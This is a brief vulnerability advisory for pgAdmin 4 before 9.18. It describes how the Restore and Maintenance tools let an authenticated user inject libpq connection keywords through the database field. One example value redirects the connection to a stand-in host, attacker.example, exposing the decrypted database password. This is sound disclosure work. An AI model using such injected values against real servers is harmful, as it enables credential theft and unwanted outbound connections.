Pgadmin · Pgadmin · CVE-2026-86862
**Name of the Vulnerable Software and Affected Versions**
pgAdmin 4 versions prior to 9.18
**Description**
The Restore and Maintenance tools pass the client-supplied `database` field directly as the value of the `--dbname` option for `pg restore` and `psql`. Because libpq expands database names containing an equals sign into full connection strings, connection keywords in that value take precedence over the `--host` and `--port` arguments. An attacker can provide a value like `host=attacker.example port=5432 dbname=x` to redirect the utility to a server of their choice. Since pgAdmin exports the decrypted database password in the `PGPASSWORD` environment variable, the redirected connection may expose this credential to the attacker. Additionally, this allows outbound connections from the pgAdmin host to arbitrary network addresses. This issue is reachable by any authenticated user with `tools restore` or `tools maintenance` permissions, which are granted to the default User role.
**Recommendations**
Update to version 9.18 or later.